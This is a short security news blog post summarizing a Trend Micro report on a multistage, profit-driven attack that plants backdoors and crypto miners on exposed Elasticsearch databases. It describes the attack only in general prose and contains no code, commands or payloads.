Cyberattack on Elasticseach Databases turns DBs into Zombies/Botnets


Table of Contents

Recently a new cyberattack was added to the list of Elasticsearch, which is making Elasticsearch databases into Zombies or botnets.

There is a list of attacks conducted on Elasticsearch databases in the past few years. The new one raises more tension among security experts due to its complexity and different tactics to evade the security system and carry forward the attack successfully.

Elasticsearch is a popular tool that helps companies managing billions of records in the database easily. Its source code is open, and big companies like Netflix, Uber, Dell, and Adobe already use Elasticsearch. I hope you now understand how important it is for hackers to find vulnerabilities in this tool and exploit them to gain systems control.

Recently, Trend Micro, a cybersecurity company, revealed hackers had targetted publicly available Elasticsearch databases by delivering a backdoor as a payload.

The attack requires multiple scripts to be executed on the system, starting from disabling the system firewall and stopping all the crypto mining processes running on the system. Once these tasks are completed successfully, hackers download another script from a compromised or grey website to the server.

If you are a blogger and wondering why bots are trying to break into your blog, this is mostly why they do that. Hackers use compromised websites to conduct big cyber attacks. Well, this is another topic for another day.

In case the system detects the URL and block the URL trying to download malicious script, hackers can also change this URL easily.

It is a profit-driven attack

This particular type of attack is profit-driven. In the first step, Hackers stopped the firewall and then stopped already-running cryptocurrency mining processes to start their own crypto mining processes.

Trend Micro also detected the malware named BillGates, which steals system information and can launch DDoS attacks. The BillGates malware was first encountered in 2014. You can read about it on the Akamai website.

The post also brings more attention to how this technique is dangerous to evade system detection and complete the task. Trend Micros also mentions that such attacks could be testing for conducting a bigger cyberattack in the future.

An attack that takes precautions to evade detection and uses multistage execution techniques is a red flag…

Trend Micro

For a more detailed analysis of the attack, please head over to the trend micro website. They have also provided scripts images and described how each script does its job.